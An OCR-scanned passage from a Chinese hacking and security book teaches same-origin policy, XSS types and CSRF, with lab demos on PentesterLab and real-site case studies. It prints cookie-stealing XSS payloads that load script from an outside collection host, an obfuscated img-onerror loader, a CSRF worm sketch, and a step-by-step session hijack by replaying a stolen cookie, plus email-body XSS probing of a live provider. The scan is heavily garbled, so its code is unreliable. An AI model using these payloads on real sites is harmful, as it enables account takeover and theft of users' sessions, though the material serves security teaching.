同 源 策略 是 浏览 器 的 核心 策略 之 一 ， 例 如 自行 查找 时 也 许 会 看 到 这 样 一 句 话 : 
“所 谓 同 源 是 指 域 名 、 协 议 、 端 口 相同 。” 下 面 是 几 个 与 http://www.mapers.net 是 否 同 源 
的 例子 。 

> http://mapers.net: 不 同 域 ， 域 名 不 同 ， 这 里 是 顶级 域名 。 

> https://www.mapers.net: 不 同 域 ， 协 议 不 同 ， 这 里 是 https 协 议 。 

> http///test.mapers.net: 不 同 域 ， 域 名 不 同 ，test 是 另 一 个 子 域 。 

> htp//Awwwmapersnet123: 不 同 域 ， 端 口 不 同 ，123 端 口 与 80 端 口 〈 默 认 端 口 ) 不 同 。 

> http//www.mapers.neta/; 同 域 ， 满 足 域名 、 协 议 、 端 口 相同 。 

通俗 地 讲 ， 如 果 你 试图 通过 JavaScript 脚 本 获取 当前 页 面 的 信息 或 者 让 它 进行 你 所 期 
望 的 操作 ， 那 么 就 需要 让 脚本 在 这 个 页 面 触发 。 

详细 介绍 JavaScript 的 编程 语法 会 占用 大 量 篇 幅 ， 这 里 只 简明 扼要 地 提出 一 些 用 于 测 
试 的 语句 和 触发 方法 。 事 实 上 在 很 多 时 候 ， 用 于 达到 目的 的 JavaScript 脚 本 在 网 上 能 大 量 
搜集 到 ， 可 以 作为 参考 。 

下 面 是 使 用 JavaScript 的 几 种 具体 方式 。 


1. 使 用 JavaScript 伪 协议 在 浏览 器 的 URL 栏 直接 触发 


在 浏览 器 URL 栏 输入 的 代码 如 图 6-5 所 示 。 

URL 栏 中 的 JavaScript 便 是 这 种 方式 的 脚本 触发 环境 ， 而 后 面 紧 跟 的 alert() 函 数 也 就 是 
弹出 警告 框 ， 有 些 跨 站 师 提倡 在 测试 中 尽量 使 用 prompt()， 笔 者 也 经 历 过 针对 alert0) 函 数 的 
过 滤 ， 却 还 是 喜欢 用 alert0 来 测试 。 
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6-5 在 URL 栏 执行 JavaScript 
2. 写 入 页 面 中 的 脚本 


依然 以 刚才 学 习 HTML 时 所 用 的 网 页 为 例 ， 在 代码 中 新 写 入 一 句 <body onload-"alert 
(' 这 是 一 个 Onload 事 件 ') ">， 效 果 如 图 6-6 所 示 。 
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图 6-6 ”onload 事件 触发 JavaScript 

onload 事 件 在 HTML 内 使 用 将 会 触发 其 中 的 JavaScript 函 数 执行 对 应 的 语句 。 

当然 ， 还 可 以 用 <scrip 人 标签 引入 JavaScript， 后 文 将 有 实例 说 明 。 

3. 加 载 外 部 脚本 

在 编写 网 页 的 时 候 ， 时 常 需 要 插入 脚本 ， 对 于 短 的 脚本 用 前 两 种 方式 就 足够 应 付 了 ， 
如 果 脚 本 的 内 容 太 长 ， 就 不 得 不 使 用 加 载 外 部 脚本 的 方法 来 执行 ， 只 要 使 用 <scrip 伺 标签 
的 src 属 性 即 可 ， 如 下 例 。 

«script src="http://www. Xxxx. com/xxx"></script> 

http://www. xxxx.com/xxx 指 向 一 个 JavaScript 地 址 ， 而 这 里 所 需要 做 的 只 是 指向 它 ， 
这 样 当 前 页 面 就 会 执行 这 个 JavaScript 脚 本 了 ， 关 于 这 种 用 法 后 面 还 会 用 到 。 


6.1.3 URL 地 址 的 构成 


URIL 其 实 就 是 平时 大 家 所 说 的 网 址 ， 只 是 比 通常 人 们 想象 中 要 稍微 复杂 一 些 ， 一 个 标 
准 的 URL 地 址 结构 如 下 。 
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协议 名 :// 主机 地 址 [ :端口 ] / 路 径 / [; 参 数 ] [? 查 询 ]# 信 息 片段 


平时 我 们 所 访问 的 网 址 其 实 是 有 所 省 略 的 ， 例 如 www.baidu.com， 如 果 将 它 完整 地 写 
出 来 ， 应 该 是 http://www.baidu.com: 80/。 

由 于 浏览 器 默认 协议 为 http， 对 应 的 默认 端口 号 为 80， 故 可 以 省 略 。 但 如 果 要 访问 互 
联网 上 的 其 他 资源 ， 则 需要 加 上 协议 名 ， 如 ftp://。 

相应 地 ， 了 解 网 站 内 的 路 径 和 参数 也 非常 重要 ， 例 如 网 址 末尾 常见 的 /../asp?id=x 就 是 
将 x 作为 参数 id 的 内 容 传 入 页 面 ， 有 兴趣 的 读者 不 妨 再 去 了 解 一 下 http 请 求 、get 方 法 和 post 
方法 ， 这 些 都 是 很 有 必要 的 。 


6.2.1 XSS 攻 击 原理 


有 了 必要 知识 的 准备 ， 就 可 以 开始 了 解 现今 互联 网 中 最 难以 完全 防御 ， 也 是 和 人 的 
交互 度 最 高 的 攻击 方法 一 一 XSS (Cross-Site Scripting) 攻击 了 。XSS 即 跨 站 脚本 攻击 ， 其 
原理 就 是 通过 存在 的 漏洞 网 站 欺骗 用 户 在 当前 域 执行 黑客 提前 设计 好 的 恶意 JavaScript 脚 
本 ， 这 些 脚本 往往 会 在 不 经 意 间 就 让 用 户 的 浏览 器 执行 了 自己 不 期 望 发 生 的 动作 ， 有 时 用 
户 发 现 这 些 恶 意 动作 后 会 咨询 为 什么 会 中 招 。 某 些 “计算 机 高 手 ” 或 许 会 告诉 他 “一 定 
下 载 了 带 有 病毒 的 软件 ”。 然 而 事实 未 必 如 此 ， 即 使 不 用 恶意 软件 ，XSS 也 可 以 达到 一 些 
相仿 的 作用 ， 这 在 接 下 来 的 章节 中 将 会 详细 展示 。 


6.2.2 XSS 攻 击 的 分 类 


通常 意义 上 的 XSS 漏 洞 分 为 反射 型 和 储存 型 两 种 类 型 。 

反射 型 XSS 通 常 借 URL 传 参 的 方式 将 恶意 内 容 传 入 当前 页 面 以 触发 黑客 设计 的 
JavaScript 脚 本 ， 且 打开 链接 的 用 户 即 会 成 为 受害 者 ， 而 储存 型 则 是 通过 POST 请 求 等 方法 
将 恶意 参数 持久 地 提交 进 一 个 页 面 中 ， 故 又 被 称 为 持久 性 XSS。 存 储 型 XSS 的 数据 是 储存 
在 服务 器 上 的 。 

很 多 地 方 喜欢 把 DOM XSS 也 作为 一 种 XSS 类 型 ， 事 实 上 ， 这 种 类 型 从 效果 上 来 说 也 
是 反射 型 XSS， 但 由 于 发 现 它 的 安全 专家 把 它 单独 作为 一 个 分 类 ， 所 以 常 被 单独 拿 出 来 。 

先 来 看 一 下 反射 型 XSS， 这 里 以 一 个 名 为 web_for pentester 的 实验 镜像 进行 演示 ， 读 
者 可 以 前 往 这 个 实验 镜像 的 官方 网 站 Chttp://pentesterlab.com/exercises/web for pentester/) 
下 载 最 新 版 本 的 镜像 并 在 虚拟 机 里 安装 实验 。 这 里 选择 的 虚拟 机 软件 是 VMware 
Workstation， 安 装 方法 不 再 袭 述 。 

虚拟 机 安装 完成 后 将 会 看 到 如 图 6-7 所 示 的 界面 。 
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图 6-7 虚拟 机 安装 完成 界面 


前 端 


安 


全 探秘 /一 


在 提示 符 界面 输入 ifconfig 查 看 这 个 虚拟 机 所 使 用 的 IP 地 址 ， 笔 者 得 到 的 地 址 是 
192.168.101.144。 


在 浏览 器 中 输入 这 个 地 址 查看 ， 如 图 6-8 所 示 。 


可 以 看 到 ， 
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图 6-8 ”虚拟 镜像 Web 界 面 





€ | & 192.168.101.144/xss/examplel.php?name=hacke 
Hello hacker 
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图 6-9 ”Web 界面 细节 
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实验 环境 已 经 安装 好 了 ， 这 里 只 选择 第 一 个 XSS 实 验 ， 如 图 6-9 所 示 。 
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可 以 看 出 ，URL 地 址 中 的 hacker 字 符 串 被 传递 给 了 参数 name 并 直接 被 输出 到 页 面 ， 再 
次 尝试 提交 ， 也 可 以 直接 将 其 替换 成 <script>alert(1)</script>， 按 回 车 键 进入 页 面 ， 如 图 
6-10 所 示 。 





图 6-10 触发 XSS 

不 难看 出 ， 这 里 的 输出 没有 做 任何 过 滤 ， 于 是 浏览 器 将 我 们 的 输入 当成 了 合法 HTML 
语句 ， 从 而 执行 了 在 <scripf 标 签 内 定义 的 JavaScript 脚 本 alert(])。 

Web pentester lab 中 的 9 个 XSS 实 验 难度 是 依次 加 大 的 ， 但 事实 上 仍然 属于 很 基础 的 训 
练 ， 读 者 不 妨 自己 将 它们 一 一 解决 ， 以 熟悉 反射 型 XSS 的 基本 测试 方法 。 

下 面 来 看 看 DOM Based XSS。 

这 是 一 段 很 经 典 的 DOM 输 出 ， 如 图 6-11 所 示 。 

id 为 m 的 div 中 会 有 test 字 样 ， 按 照 反 射 型 XSS 的 原理 ， 在 测试 时 把 test 换 成 <img 
srC 二 xxxonerror=alert(1)>， 效 果 如 图 6-12 所 示 。 


| The page at says: * I 
1 


ById ("n"). innerHTHL-x 确定 


图 6-11 经 典 DOM 输 出 图 6-12 ром XSS 触发 

这 里 有 一 些 经 典 的 bypass， 比 如 在 这 里 对 字符 进行 Unicode 编 码 ， 也 是 会 正常 输出 的 。 

储存 型 XSS 和 反射 的 原理 相同 ， 通 常 是 通过 一 些 表单 内 容 的 提交 被 插入 到 一 个 合法 页 
面 中 ， 例 如 评论 框 、 个 人 资料 、 邮 件 等 。 如 果 没 有 显 式 的 XSS 测 试 语句 而 是 构造 一 个 静默 
的 恶意 JavaScript 语 句 ， 用 户 通 常 极 难 察觉 。 

除 此 之 外 ， 还 有 一 种 经 常 被 忽略 的 XSS 类 型 ， 即 Flash XSS。 前 文 所 提 及 的 XSS 攻 击 
都 是 基于 HTML 的 ， 在 Flash 中 也 有 可 能 会 产生 XSS。Flash 中 的 ActionScipt 也 是 一 种 类 似 
JavaScript 的 强大 的 脚本 语言 ， 目 前 在 使 用 的 有 2.0 和 3.0 两 种 版 本 。 在 ActionScipt 中 常 出 现 
问题 的 函数 就 是 navigateToURL/getURL 及 ExtermalInterface.call。 








6.2.3 XSS 的 利用 
目前 常用 的 XSS 攻 击 手段 中 ，cookie 动 持 是 最 主要 的 手法 ， 后 面 将 会 重点 介绍 。 下 面 
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首先 介绍 XSS 平 台 。 
之 所 以 用 到 平台 ， 是 因为 它 能 够 帮 人 们 更 好 地 存放 payload 已 经 管理 的 “战果 ”， 上 : 




















于 黑客 不 方便 在 页 面 中 插入 大 量 恶 意 脚本 且 容 易 引起 注意 ， 他 们 往往 通过 加 载 外 部 脚本 发 
动 攻击 ， 这 外 部 脚本 便 是 payload。 

国内 很 常见 的 XSS 平 台 是 XSS platform， 界 面 如 图 6-13 所 示 。 

首先 创建 一 个 项 目 ， 如 图 6-14 所 示 。 





图 6-13 XSS platform 平 台 图 6-14 ”新 建 一 个 项 目 
单 击 “ 下 一 步 ” 按 钮 ， 将 会 看 到 payload 选 择 界面 ， 如 图 6-15 所 示 ， 这 是 模块 选项 
界面 。 





图 6-15 ”模块 选项 
如 果 想 要 创建 cookie 动 持 的 项 目 ， 选 择 上 面 两 个 即 可 ，“ 基 础 认证 钓鱼 ”模块 用 于 
401 钓 鱼 ， 感 兴趣 的 读者 可 以 自己 尝试 。 此 外 ， 外 部 恶意 PHP 图 片 导致 的 401 钓 鱼 比 XSS 钓 
鱼 存 在 得 更 为 广泛 ， 因 为 很 多 厂商 认为 “这 并 不 是 很 严重 的 功能 性 问题 ”。 
创建 好 cookie 动 持 的 模块 后 可 以 一 探究 竟 ， 如 图 6-16 所 示 。 





`'//xss_nacktask net/do/auth/7ae12aBdc08833107bdecaba05d33ff7 





图 6-16 ”项目 细节 (1) 
可 以 看 到 ， 项 目 返回 了 一 个 接口 地 址 ， 这 个 地 址 用 于 接收 恶意 cookie 动 持 脚本 返回 的 
内 容 ， 如 果 想 查看 恶意 脚本 所 在 的 位 置 ， 不 妨 单 击 “查看 代码 ”按钮 。 
如 图 6-17 所 示 ， 这 里 需要 的 payload 已 经 根据 之 前 所 打 勾 的 选项 预先 生成 好 了 ， 下 方 还 
提供 了 生成 的 外 部 JavaScript 地 址 和 一 些 基 本 的 插入 方式 。 


= = 
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图 6-17 项目 细节 (2) 
查看 一 下 上 面 所 写 的 恶意 payload 地 址 ， 如 图 6-18 所 示 。 


© XSS Platform. XJ © htpy/xs 





€ | @ sss hacktasknet/EC1NmP?1415258770 g 


) 0)+ &toplocation- +escape((function 0 {try [return top. location. href} catch (e) (ret 
) 0)+ &opener-' +езсаре (function {try {return (window. opener && window. op 
keep-new Image Ü ;keep. src= http: //xss. hacktask. net/index. php?do-keepsessior 


(function() ((new Image 0). src= http://xss. hacktask. net/index. ation beef catch ) те 







' version': 
' author" :’ jackmasa' 


x. x-function(id) (return document. getElementById(id)) 


LUE d 


x. efunction( ) (try (return eval( (++ )’)}catch(e) (return ’ 
图 6-18 ”恶意 payload 地 址 

这 样 一 来 ， 攻 击 者 只 需要 利用 XSS 漏 洞 欺 骗 受 害 者 加 载 这 个 外 部 恶意 脚本 就 好 了 。 当 
然 ， 未 必要 用 到 XSS 漏 洞 ， 也 可 以 通过 人 性 的 弱点 欺骗 一 些 安全 意识 差 的 用 户 触发 ， 这 种 
手法 不 在 本 章 的 介绍 范围 内 ， 后 面 社会 工程 学 中 将 会 提 及 ， 和 迫不及待 想 要 了 解 的 读者 也 可 
现在 去 翻 看 。 

XSS 的 构造 方式 也 很 简单 ， 只 要 把 插入 语句 换 成 <script src= 恶 意 脚本 地 址 ></scrip 亿 用 
以 构造 即 可 ， 另 一 种 插入 方式 是 利用 <img> 标 签 构造 一 个 节点 以 加 载 外 部 脚本 ， 如 下 面 这 
一 段 代码 所 示 。 


























<img src=# id-xssyou style="display: none; onerror-eval (unescape (/ 
var$20b$3Ddocument.createElement$282$22script$22$29$3Bb.src$3D$22http$ 
3AS$2F$2Fxss.hacktask.net$2FEC1NmP$3F$22$2BMath.random$28$29$3B$28 
document.getElementsByTagName$28$22HEAD$22$292$5B0$5D$7C$7Cdocument.body$ 
29.appendChild$28b$29$3B/.source) )"; /> 


—— WM — 
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som namena 2 


这 里 还 使 用 刚才 的 实验 平台 ， 这 一 次 提交 的 恶意 参数 如 下 ， 如 图 6-19 所 示 。 
<script src=" http://xss.hacktask.net/EC1NmP?1415258770" ></script> 


© XSS Platform x | http//xssh..71415258770 х UJ @ PentesterLab > Web for -. 





€ @ 192.168.101.144; 





Hello 
© PentesterLab 2013 





图 6-19 执行 payload 测 试 
插入 恶意 参数 并 按 回 车 键 以 后 ， 会 看 到 加 载 的 小 圆圈 多 转 了 一 会 儿 后 停止 了 ， 这 是 因 
为 提交 的 JavaScript 脚 本 已 经 被 执行 ， 可 以 使 用 Firebug 来 查看 一 下 执行 情况 ， 如 图 6-20 所 示 。 












Bl «script src= “http 





(function) {бн 1 Image( tp: //xss. hacktask. net/index. php% 
2| if(1'—1) (keep-new Image() ;keep. src= http://xss. hacktask. net/ind 
гуаг xss = function ( 


图 6-20 ”Firebug 查 看 界面 
不 难看 出 ， 外 部 脚本 已 经 被 加 载 ， 这 时 再 访问 该 平台 会 看 到 已 经 成 功 地 支持 了 受 
的 信息 ， 如 图 6-21 所 示 。 








e1238dc08833107bd6caba06d33 作 7 





图 6-21 劫持 信息 
因为 平台 并 没有 给 用 户 发 放 cookie， 所 以 这 里 的 cookie 项 为 空 ， 但 是 实战 中 它 往往 是 
一 大 串 字 符 ， 通 过 劫持 到 的 用 户 cookie， 可 以 用 浏览 器 插件 替换 原 有 cookie 并 绕 过 登录 账 
户 和 密码 直接 进入 受害 者 在 当前 网 站 的 账户 ， 下 面 的 章节 将 会 有 实例 演示 。 
不 过 ， 在 讲解 接 下 来 的 内 容 之 前 ， 必 须 介 绍 另外 一 种 前 端 安 全 技术 一 一 CSRF， 在 很 
多 真实 场景 下 ，XSS 和 CSRF 的 结合 使 用 将 会 得 到 意 想不到 的 收获 。 





— 103 一 一 


ANS 黑客 与 安全 技术 指南 
63 CSRF 攻 击 


6.3.1 CSRF 简 介 


CSRF (Cross-site request forgery) 即 跨 站 请 求 伪 造 ， 是 Web 跨 域 攻击 的 一 种 。 简 单 地 
说 ， 如 果 用 户 同时 登录 了 两 个 网 站 ， 其 中 一 个 是 存在 CSRF 漏 洞 的 网 站 ， 另 一 个 是 恶意 网 
站 ， 那 么 只 要 通过 存放 在 恶意 网 站 处 的 脚本 让 用 户 的 浏览 器 向 存在 漏洞 的 网 站 发 送 一 个 请 
求 ， 就 可 以 在 不 经 意 间 使 得 用 户 在 存在 漏洞 网 站 执行 一 个 动作 。 

如 果 上 面 的 描述 依然 不 够 清晰 ， 下 面 就 用 更 形象 的 方式 来 讲解 : 

假设 站 点 blabla 存 在 CSRF 漏 洞 ， 且 可 以 通过 “http://blabla.com/?recver= 收 件 人 
&&content= 内 容 ” 来 发 送 一 条 私信 ， 而 攻击 者 手 上 有 一 个 恶意 网 站 ， 那 么 他 可 以 在 自己 
的 恶意 网 站 上 用 JavaScript 构 造 一 个 请 求 ， 使 得 打开 恶意 网 站 的 用 户 自动 触发 ( 比 
如 用 window.open() 函 数 ) 这 个 GET 请 求 ， 打 开 恶 意 网 站 的 用 户 将 在 自己 没有 意识 到 
的 情况 下 就 会 发 送出 私信 。 从 技术 层面 上 看 ， 现 在 通常 只 有 用 验证 HTTP Referer 字 
段 ， 在 请 求 地 址 中 添加 token 并 验证 ， 在 HTTP 头 中 通过 自 定义 属性 并 验证 等 手段 来 防 
御 CSRF， 而 事实 上 还 有 非常 多 的 网 站 尚未 对 此 引起 注意 ，CSRF 也 因此 被 称 为 安全 漏洞 中 
“沉睡 的 巨人 ”。 


6.3.2 利用 CSRF 


正如 上 面 所 说 ， 互 联网 中 依然 存在 非常 多 有 CSRF 漏 洞 的 网 站 ， 而 很 多 提 到 CSRF 技 术 
的 文献 中 都 喜欢 用 老 套 的 银行 穷 款 模型 进行 讲解 ， 这 些 文献 喜欢 假设 在 一 个 存在 CSRF 漏 
洞 的 银行 网 站 可 以 一 步 转账 ， 而 另 一 个 恶意 攻击 者 在 受害 者 登录 银行 网 站 时 通过 某 种 信道 
给 他 发 送 了 有 CSRF payload 的 恶意 网 址 ， 从 而 使 这 个 受害 者 在 不 知情 的 情况 下 就 把 钱 转 给 
了 攻击 者 。 

以 上 情景 是 否 发 生 过 笔者 尚 不 知道 ， 但 就 现在 的 网 上 交易 而 言 ， 该 事件 发 生 的 几率 似乎 不 
会 很 大 。 

CSRF 攻 击 还 有 一 个 特点 就 是 由 它 还 可 以 制造 出 传播 速度 惊人 的 蠕虫 。 还 是 以 上 面 站 
点 为 例 ， 攻 击 者 可 以 把 其 中 的 内 容 转换 成 恶意 网 址 “http://blabla.com/?recver=xxx&content= 
恶意 网 址 ”， 并 且 在 恶意 网 址 中 设置 如 下 的 payload。 


<script> 
var xxxArray- (获取 所 有 好 友 列 表 , RE) ; 
for (xxx in xxxArray) 
il 
window.open( "http://blabla.com/?recver-" +ххх+" 


&content= 恶 意 网 址 地 址 ” )........ 
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} 

</script> 

代码 并 没有 经 过 仔细 设计 ， 但 却 大 致 勾勒 出 了 一 个 蠕虫 的 模型 ， 从 私信 点 进 恶意 网 址 
的 人 会 触发 很 多 个 恶意 网 址 ， 进 而 危害 到 每 一 个 好 友 。 这 样 的 传播 速度 是 无 法 估量 的 ， 已 
经 无 法 直观 感知 ， 只 能 用 更 为 精确 的 数学 模型 来 描述 一 一 指数 爆炸 型 增长 。 

再 设想 ， 假 设 目 标 站 点 还 同时 存在 XSS 漏 洞 ， 一 旦 和 CSRF 蚂 虫 结合 使 用 ， 成 千 上 万 
的 受害 者 就 将 会 遇 到 更 大 的 麻烦 了 。 








64 ”实战 案例 演示 
注 : 本 节 所 提 到 的 所 有 漏洞 均 已 修复 。 


6.4.1 一 个 导致 网 站 沦陷 的 反射 XSS 


下 面 演示 一 个 很 标准 的 反射 XSS 示 例 。 
在 站 点 地 址 栏 提 交 了 <script>prompt(1)</scrip 人 后 ， 那 个 prompt 对 话 框 就 弹 了 出 来 ， 如 
图 6-22 所 示 。 








图 6-22 存在 XSS 

既然 存在 XSS 漏 洞 ， 那 么 恶意 黑客 就 可 以 构造 cookie 动 持 的 恶意 链接 ， 并 将 这 个 链接 
伪装 后 发 给 站 长 ， 站 长 单 击 后， 正 处 在 后 台 登 录 状态 的 cookie 被 截获 ， 通 过 伪造 的 cookie 
顺利 垂直 提 权 ， 就 可 以 进一步 getshell 提 权 服 务 器 了 。 

思路 已 经 有 了 ， 然 而 目的 并 非 渗 透 这 个 站 点 ， 而 是 测试 展示 cookie 劫 持 的 利用 方法 ， 所 以 
并 没有 再 去 招惹 站 长 的 必要 ， 这 里 就 用 一 次 简单 的 水 平 越权 来 展现 cookie 劫 持 技术 的 作用 。 

所 谓 的 水 平 越权 ， 其 实 就 是 在 同样 的 权限 下 ， 访 问 其 他 用 户 的 空间 ， 使 用 不 属于 自己 
的 权限 。 为 了 展示 ， 笔 者 注册 了 两 个 账户 ， 并 在 火狐 和 Chrome 浏 览 器 分 别 登录 ， 以 模拟 
黑客 和 受害 者 ， 因 为 法 律 问题 ， 且 本 站 点 涉及 充值 等 敏感 信息 ， 请 不 要 把 其 他 合法 用 户 作 
为 实验 目标 。 

笔者 创建 了 两 个 账户 ，testxss 将 会 模拟 受害 者 ， 而 xxetest 则 是 黑客 的 账号 ， 如 图 6-23 所 示 。 
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图 6-23 ”测试 账号 
现在 重新 审视 一 下 反射 XSS 的 所 在 并 设计 恶意 链接 ， 其 exploit 如 下 。 
http: .com/search.aspx?keyword=【XSS 点 】 
由 于 <script> 标 签 没 有 过 滤 ， 各 种 符号 也 几乎 没 作 限制 ， 所 以 可 以 很 自由 地 用 <script 
src=xxx></script> 来 加 载 外 部 JS 脚本 ， 最 终 的 恶意 链接 如 下 。 
http: .com/search.aspx?keyword--script src=http://xss.hacktask.net/ 
ECINmP?1415264855></script> 


当 testxss 用 户 打开 这 个 链接 时 ， 他 所 感受 到 的 也 许 只 是 网 页 加 载 慢 了 一 些 ， 他 所 看 到 
的 页 面 将 会 如 图 6-24 所 示 。 








图 6-24 XSS 实 际 已 被 触发 
他 却 浑然 不 知 自己 已 经 中 了 黑客 的 圈套 。 
再 来 看 看 我 们 的 平台 ， 如 图 6-25 所 示 。 






图 6-25 ”接收 到 窃取 的 信息 
不 难看 出 ， 框 出 的 部 分 便 是 劫持 到 的 cookie， 我 们 把 内 容 复制 到 一 个 空白 的 记事 本 
中 ， 如 图 6-26 所 示 。 


T cooker -EFF 

AHA SRE 格式 (QO) EEV шан) 
Hm_1vt_293e6478bTa6244947def414562ecfeT=1414904491, 1414904604, 1415241435, 14. 
15263266; lzstat_uv=31031825973791672107|3486570; 
Hm_1pvt_293e6478b7a6244947def414562ecfe7=141526474); 

lzstat ss-338967590 2 1415293540 3486570; m_email=cssors%40163. com; 
im password-F72106000000000082c1eky0i ffsvsr5tlaxxpchded; 

















图 6-26 cookie 信息 
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如 果 读 者 觉得 这 样 看 起 来 很 乱 的 话 ， 不 妨 写 一 个 简单 的 Python 脚本 整理 一 下 ， 立 刻 就 
会 清爽 很 多 ， 如 图 6-27 所 示 。 


[3] resulttxt - 记事 本 
RHA SRE 格式 (O) ”查看 (V) EAH) 


Hm_1vt_293e6478b7a6244947defd14562ecfe7=1414904491, 1414904604, 
lzstat. uv=31031825973791672107 3486570 
Hm_lpvt_293e6478b7a6244947defd14562ecfe7=J4 
lzstat Ss=338967590_2 1415293540_3486570 = 记事 本 
m email-cssors* 
Mode EF 121060000600000%2c1eky0i fevd AN- IE) 85040) 
Hm lvt_293e6478b7a63 
15263266; lzstat i 
Hm lpvt 293e64T8b7ad 
lzstat 552338967590 
m password-FT210600] 


































司 1.py - 记事 本 
XH) (Е) 18500) тру изн) 


А = open("cookie. txt”, "r") 
B = open("result. txt” ^w^) 
С = A. readÜ 


















foriinC:, 


ifi- 






i = 
B.write(i. strip’ )) 


print C 





图 6-27 ”用 Python 脚本 整理 cookie 信 息 
既然 黑客 已 经 拿 到 了 受害 者 的 cookie， 他 现在 要 做 的 就 是 把 这 个 cookie 替 换 进 浏览 器 
里 。 有 很 多 工具 都 可 以 实现 这 个 功能 ， 甚 至 是 在 火狐 浏览 器 下 如 果 不 想 用 Firebug， 用 Fire 
cookie 插 件 同样 可 以 完美 地 完成 任务 ，Chrome 浏 览 器 的 插件 Edit This Cookie 也 是 一 样 优 
秀 ， 这 里 我 们 选用 它 来 替换 ， 如 图 6-28 所 示 。 
这 张 “ 小 煎饼 ” 便 是 Edit This Cookie 了 ， 单 击 它 ， 看 一 看 界面 ， 如 图 6-29 所 示 。 
is ESTES ERENER ^ 





zom | Hm Ipve_20306478b746244947defd14561ecfe7 
com | He let_293e6478b796244947defd14562ecfe7 
com | lestat ss 

zom | lastat uv 

сот | т етей 

сот | m.passward 

com | nickname 


E | bdshare firstime 








1414070662413 














FUL] 
23/10/2022 09:30 PM 





кекоеу 国 session D жес hpOnly D 














图 6-28 Edit This Cookies tt 图 6-29 ”查看 cookie 信 息 


可 以 看 到 ，Edit This Cookie 插 件 已 经 把 当前 用 户 的 cookie 一 一 列举 出 来 ， 攻 击 者 只 需 
要 把 对 应 的 值 ， 也 就 是 刚刚 “窃取 ”到 的 cookie 对 应 地 填 进 去 即 可 。 
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填写 完毕 后 刷新 页 面 可 以 看 到 ， 攻 击 者 已 经 成 功 登录 进 受害 者 的 账户 了 ， 如 图 6-30 
所 示 。 














J testxss | 充值 | 我 的 博客 | 退出 ӘӘ олот 
Danne thess 


iE AX 社 科 儿童 英语 评书 曲艺 Sx шн 科学 探索 


图 6-30 ”伪造 cookie 登 录 成 功 





64.2 ”精确 打击 : 邮箱 正文 XSS 


南京 大 学 近 两 年 曾 有 一 名 “黑客 ”在 网 上 发 帖 称 : “通过 入 侵 老 师 邮箱 获取 考卷 以 及 
修改 考试 成 绩 ”。 这 个 事件 引起 了 轩然大波 ， 社 会 与 论 和 盲目 的 崇拜 者 席卷 而 来 ， 这 位 仁 
兄 因此 也 红 极 一 时 。 实 际 上 ， 他 所 用 的 技术 也 正 是 XSS， 他 还 指出 ， 很 多 学 校 邮箱 系统 都 
存在 此 类 问题 ， 这 也 印证 了 XSS 广 泛 存在 这 一 事实 。 这 里 就 带 大 家 揭秘 他 究竟 是 如 何 入 侵 
老师 邮箱 的 。 

邮箱 类 的 XSS 就 像 是 精确 制导 武器 ， 制 造 好 的 导弹 非常 精确 地 攻 向 受害 者 ， 而 这 些 
导弹 也 分 优 劣 ， 优 质 的 如 正文 储存 型 XSS， 命 中 率 极 高 ， 也 能 很 大 几率 地 “光荣 完成 任 
务 ”。 这 里 介绍 一 个 这 样 的 邮箱 XSS， 为 了 不 使 复杂 的 bypass 绕 晕 读 者 ， 这 里 我 们 找到 了 
一 个 过 滤 不 严谨 的 邮箱 提供 商 进行 测试 。 

此 次 的 测试 目标 如 图 6-31 所 示 。 





D 


P 妈妈 再 也 不 合 用 无 限 邮 账号 
y 二 和 忘记 帐号 了 / 邮箱 将 会 帮 你 记 住 
ња л 
B scs A maux 










图 6-31 ”邮箱 XSS 测 试 目标 
初步 审视 这 个 邮箱 系统 ， 看 上 去 清 清 爽 爽 ， 似 乎 和 网 易 、QQ 邮 箱 等 并 无 两 样 。 然 而 
安全 性 是 否 也 如 此 呢 ， 简 单 测试 一 下 便 可 知晓 。 
登录 一 个 163 邮 箱 作 为 发 件 账号 ，lualualua@2925.com 则 作为 被 测试 账号 ， 先 按 如 下 的 
方法 发 送 一 封 邮件 。 
先 在 正常 编辑 状态 随意 写 下 一 个 字符 串 ， 如 test123， 插 入 这 个 字符 串 的 目的 是 方便 在 
收 件 页 面 调试 时 定位 ， 后 面 会 看 到 ， 然 后 输入 “< >” 编 辑 HTML 代 码 。 先 测试 一 句 经 典 
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的 payload 语 句 : <script>alert(1)</script>， 如 图 6-32 所 示 。 
这 是 编辑 后 的 语句 ， 编 辑 好 后 不 要 返回 文本 编辑 模式 ， 直 接 单 击 “ 发 送 ”按钮 。 
事实 证 明 ， 收 件 处 并 没有 弹 窗 ， 如 图 6-33 所 示 ， 用 Firebug 跟 踪 ， 通 过 刚才 输入 的 字符 
串 对 输出 进行 定位 。 





收 件 人 lualualua@2925.com 


+ m: test 











pe p ew p wr f we [| ms [ня + 


test. 

发 件 人 : oetestcooetest163.com» v 
时 A: 2014-11-06( 四 ) 18:53 

ЕРА: ualualua<iualusluaG2925.com> ; 


ОЖ (是 大 2G) | v — 邮箱 大 师 领 15G 云 附件 









| *& «*85 «E T 
евгилда- ад е а 
test123<script>alert(1)</script> 






test123 





图 6-32 ”正文 payload 测 试 图 6-33 ”发 送 结果 
如 图 6-34 所 示 ， 令 人 惊讶 的 是 <script> 标 签 已 经 成 功 地 进入 页 面 却 并 没有 执行 。 这 时 


我 们 注意 到 这 样 一 行 代码 : 


<html xmlns="http://www.w3.org/1999/xhtml"> 





© «div stylez"line-height:i.7;color 
test123 
Ө script? 
* 3] alert(1) 
€/script? 


</div> 


图 6-34 ”Firebug 定 位 输出 
由 此 可 见 ， 网 站 定义 了 需要 使 用 XHTML， 用 不 严谨 的 <script></script> 想 必 是 无 法 插 
入 了 ， 略 微 修改 一 下 语句 ， 如 下 所 示 。 
<script type="text/javascript"> 
alert ("Hello World!"); 


</script> 
再 次 发 送 ， 却 没 想到 依然 无 法 触发 ， 如 图 6-35 所 示 。 
xixi 
发 件 人 : xxetest<xxetest@163.com> v 
时 间 : 2014-11-07( 五 ) 11:51 
kiA: lualualua@2925.com<lualualua@2925.com> ; 


ХХХХХХ 


86-35 ”发 送 结果 
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这 使 笔者 颇 为 费解 ， 看 来 是 后 端 采 用 了 过 滤 ， 想 要 在 这 种 情况 下 绕 过 过 滤 十 分 困难 ， 
本 着 条 条 大 路 通 罗马 的 原则 ， 尝 试用 事件 方式 触发 。 此 时 也 刚好 想到 了 一 个 有 趣 的 事件 属 
性 : onmouseout。 在 w3school 查 一 下 ，xhtml 的 确 支持 这 个 属性 ， 对 它 的 描述 则 是 : 

当 鼠 标 指针 移出 某 元 素 时 执行 脚本 。 

想必 大 多 数 用 户 如 果 打开 邮件 看 到 一 大 段 内 容 都 会 自然 地 用 鼠标 指针 轻 轻 滑 过 它们 ， 
